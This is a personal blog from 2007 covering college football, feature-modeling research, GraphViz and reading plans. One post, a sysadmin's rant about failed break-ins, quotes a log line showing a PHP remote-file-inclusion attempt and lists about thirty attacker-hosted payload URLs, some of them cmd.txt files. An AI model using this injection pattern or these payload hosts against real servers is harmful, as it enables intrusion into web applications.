11.29.07
Posted in KSU, Sports at 3:45 pm by Todd
The Heartbreak has ended … at least until August 30. The K-State football team will not be playing in a bowl game this year which breaks my heart. But they have been breaking it all season long. It has gotten to the point that I couldn’t even watch more than a couple minutes at a time this last Saturday (Nov 24 – The Day the Bulldogs beat the Cats). I love my cats but I just couldn’t take it.
I have just gotten to the point that I don’t know what to say about the team. They seem to try very hard in spurts during the game but have a hard time sustaining the enthusiasm necessary to play at that level. They seem to have some really talented players (Watts, Campbell, Nelson, Johnson, Freeman, etc.) but they can’t seem to make it happen.
Here are my questions going forward:
- Who will replace the production that Jordy Nelson created this season? And can they be a go-to kind of receiver?
- Will Leon Patton grow into an every-down running back?
- Will we stick with the 3-4 defense? And if so, can we get better or should I resign myself to high-scoring games in hopes that we score more?
- Will Prince keep his staff or will we have major turn-over again? I really don’t know where I come down on this issue.
- Can Josh Freeman grow into the quarterback that shows up for every game like he shows up for Texas? And will he be able to get his team revved-up?
- Can we recruit the amazing linebacker from Wichita (Arthur Brown of Wichita East High School) that every team seems to want?
I really hope that Coach Prince and the rest of the staff can get these guys into shape and in a position to succeed for next season. Another season like this and I might have to give up watching. My poor heart just can’t take it.
Permalink
11.28.07
Posted in SAnToS at 4:20 pm by Todd
I just finished reading FeaturePlugin: Feature Modeling Plug-in for Eclipse by M. Antkiewicz and K. Czarnecki. A very quick read that is straight-forward: it basically describes the Eclipse plugin and how it is used. It then briefly talks about some of the other tools that are similar (CaptainFeature, AmiEddi, ConfigEditor, ReqiLine, Pure::Variants, and GEARS).
This was certainly not the best paper to start my journey with when trying to learn about feature modeling. It didn’t describe the basics but made use of the terminology. So the assumption is that readers are familiar with feature modeling prior to reading the paper. I am not familiar so it will probably make more sense once I understand the fundamentals.
Next step in this road is to download, install, and experiment with the plugin.
Permalink
11.27.07
Posted in Business at 1:44 pm by Todd
I just came across a great podcast that I am now addicted to. It is called Business Brink and is about Andrew Allgaier’s journey in creating his startup (http://www.zoomagent.com/). I have already watched the first 13 episodes and wish I had more time today to watch the rest.
Great, another source of information that I will be addicted to, just what I needed.
Permalink
11.26.07
Posted in KSU at 4:51 pm by Todd
I just finished watching the live feed from Robert Gate’s Landon Lecture. I was really impressed with his message but not with his presentation. He is not a charismatic speaker like Bill Clinton but he does an effective job of getting his point across.
I was really impressed by his call for more funding for the State Department in an effort to decrease the workload for the Department of Defense. That certainly aligns with what my friends from the military would wish for.
The other thing that really impressed me was when he pointed out that 1 guy in a cave can do a better job of communicating his message than the United States Government and its citizens. I never thought about it that way but it does ring true. On the other hand, I think there is tendency of people to discount what the “market leader” says but listen to the underdog.
For all those interested, please watch this lecture as well as the many others available.
Permalink
11.20.07
Posted in SAnToS at 3:56 pm by Todd
Over the coming weeks I will be learning more about a new technique called Feature Modeling. John Hatcliff and Matthias Niederhausen have been looking at how this can be applied to sensor networks and integrate with Cadena. I am now starting to get involved in that effort.
And as I learn more about it I am going to try and write about it here on my blog. So if you aren’t interested, change the channel now. Otherwise, learn about it along with me.
To start with, I will be reading the following papers:
And I will be experimenting with a feature model plugin to Eclipse.
To start with, I will be trying to answer the following questions:
- What is Feature Modeling?
- What problem does it solve?
- How does it relate to Software Product Lines?
- How does it relate to Component-Based Development?
- Can we use it with Cadena? If so, how?
Wish me luck. And feel free to help my education by contacting me with hints, tips, and pointers to good information on the subject.
Permalink
11.16.07
Posted in Programming, SAnToS at 3:39 pm by Todd
At work I run a project management server for our research group (the SAnToS Lab). Over the course of my time managing the machine I have had several break-in attempts (about a bijillion times might be a good guess) and a few successful ones. Lately, I think I have come across some of the dumbest script-kiddies on the planet (I feel safe in saying this since nobody, especially them, read this blog).
They are trying to take advantage of php’s ability to include arbitrary URLs (this is a very, very, very common hole in most web applications, not just this particular server or php). This is called code injection and is a reasonable way to crack into systems on the internet. I claim that this particular script-kiddie is dumb because they constantly try the same URL with the same injection URL from the same machine. For example, while watching today I saw 14 straight attempts to access the same URL from the same machine in less than 30 seconds. What kind of idiot writes this type of script? Some idiot that doesn’t understand programming? On the other hand, I am not a security expert so maybe this is some really savy way to break into hardened systems (doubtful but possible).
What’s worse is that it is obvious that the same script is being run on many “zombie” machines. They try to access the same URL, repeatedly, from different machines. I guess they figure that if it didn’t work from 1 machine that it might work from 1,000 machines.
Here is an example of what this looks like in the logs:
74.13.92.186 – - [16/Nov/2007:21:05:46 +0000] “GET /forum/forum.php?thread_id=http://amyru.h18.ru/images/cs.txt? HTTP/1.1″ 200 7994 “-” “Wget/1.1 (compatible; i486; Linux; RedHat7.3)”
And right after that they did 13 more (formatted to show just the times and IPs):
74.13.92.186 – - [16/Nov/2007:21:05:49 +0000]
74.13.92.186 – - [16/Nov/2007:21:05:49 +0000]
74.13.92.186 – - [16/Nov/2007:21:05:54 +0000]
74.13.92.186 – - [16/Nov/2007:21:05:54 +0000]
74.13.92.186 – - [16/Nov/2007:21:05:56 +0000]
74.13.92.186 – - [16/Nov/2007:21:05:57 +0000]
74.13.92.186 – - [16/Nov/2007:21:06:02 +0000]
74.13.92.186 – - [16/Nov/2007:21:06:02 +0000]
74.13.92.186 – - [16/Nov/2007:21:06:02 +0000]
74.13.92.186 – - [16/Nov/2007:21:06:05 +0000]
74.13.92.186 – - [16/Nov/2007:21:06:05 +0000]
74.13.92.186 – - [16/Nov/2007:21:06:08 +0000]
74.13.92.186 – - [16/Nov/2007:21:06:10 +0000]
Here are some of the
URLs that they have tried to inject today:
http://garyz.110mb.com/safeon.txt
http://cherrygirl.h18.ru/images/cs.txt
http://jjisdfiuw834wsdd.chat.ru/js
http://kiopmanminsuion.chat.ru/http
http://musicgirll.chat.ru/wav/mysong
http://rumusic.chat.ru/rumusic.wav
http://amygirl.chat.ru/images/image.txt
http://amyru.h18.ru/images/cs.txt
http://cherrygirl.h18.ru/images/cs.txt
http://himanhimanioum.chat.ru/man
http://jjisdfiuw834wsdd.chat.ru/js
http://kiopmanminsuion.chat.ru/http
http://musicgirll.chat.ru/wav/mysong
http://ninaru.hut2.ru/images/cs.txt
http://rumusic.chat.ru/rumusic.wav
http://users2.TitanicHost.com/ninagirl/pb.txt
http://www.voice.ch/uu
http://201.37.71.117:8090/cmd.txt
http://201.37.71.117:8090/cmdimbox.txt
http://garyz.110mb.com/safeon.txt
http://amygirl.3-hosting.net/cs.txt
http://amyru.h18.ru/images/cs.txt
http://jjisdfiuw834wsdd.chat.ru/js
http://kiopmanminsuion.chat.ru/http
http://musicgirll.chat.ru/wav/mysong
http://ninaru.hut2.ru/images/cs.txt
http://rumusic.chat.ru/rumusic.wav
http://www.voice.ch/uu
http://201.37.71.117:8090/cmd.txt
http://201.37.71.117:8090/cmdimbox.txt
Note to script-kiddies: this particular hole was closed 3 years ago when Jesse and I did some routine maintenance. But if think about it a little and get creative, you might find other holes that we failed to find. So please stop pounding the machine with your requests that fail.
Sorry, these script-kiddies are just stupid and are really annoying me today. Rant over.
Permalink
11.08.07
Posted in Programming, SAnToS at 2:49 pm by Todd
While writing a new section of the Cadena Manual I decided to try out a new tool, GraphViz. It is a very simple tool that can create some pretty amazing images of graphs. You simply create a text-based “dot” file with the description of the graph and it creates an image for you.
Here is one of the dot files that I created:
digraph interface_kinds {
node [style = filled];
node [color = gainsboro]; mInterface;
node [color = lightslateblue]; mMyEventInterface mMyCommandInterface mMyBundleInterface;
node [color = darkorange]; MyBundleInterface MyEventInterface MyCommandInterface;
mInterface->mMyEventInterface;
mInterface->mMyCommandInterface;
mInterface->mMyBundleInterface;
mMyEventInterface->MyEventInterface;
mMyCommandInterface->MyCommandInterface;
mMyBundleInterface->MyBundleInterface;
}
It describes the kinds that will be created in a new Cadena style. When run through dot (dot -Tpng interface_kinds.dot > interface_kinds.png) it produces the following image:
This is a pretty cool utility with a lot of potential uses. I am sure I only scratched the surface of what can be done. But I was pleased with what I was able to create in less than an hour of reading and experimentation.
Permalink
11.06.07
Posted in About Me, Books at 3:07 pm by Todd
This week I will be on vacation from my job at the SAnToS Lab. I was supposed to be traveling in Spain but instead Kari and I will be hanging out at home relaxing and enjoying our time together.
But when Kari gets tired of seeing me, I have plans to read. Here are some of the books that I hope to complete this week:
- The Tipping Point: How Little Things Can Make a Big Difference by Malcom Gladwell – I read Blink a month or so back and liked it.
- The Dip: A Little Book That Teaches You When to Quit (and When to Stick) by Seth Godin – His blog is really good so I thought his books would also be good.
- Rich Dad, Poor Dad: What the Rich Teach Their Kids about Money–That the Poor and Middle Class Do Not!
- Adam says it is a great book that will change my perspective
- By Order of the Presidentby WEB Griffin – I loved his Brotherhood of War series and I recently read the 2nd in The Presidential Agent series, The Hostage: A Presidential Agent Novel.
And hopefully I will find time to blog about them as well. Wish me luck in cramming as much information as possible into my tiny little brain in a week.
Permalink
11.05.07
Posted in About Me at 4:02 pm by Todd
I just wanted to let my blog readers know that I am now a sell-out. I am now using an affiliate program for links to products that I mention in my blog.
I am doing this for two reasons:
1) To earn a little extra cash – if possible.
2) To make it easier for my readers to find the products I mention. In the past I have linked to author’s websites, amazon product pages, and manufacturer’s sites. Now I will link to buy.com through their affiliate program links.
So this means that if you follow the link from my site and end up purchasing the product I will get a commission. But don’t feel obligated, it is simply a service to you, my readers.
Permalink
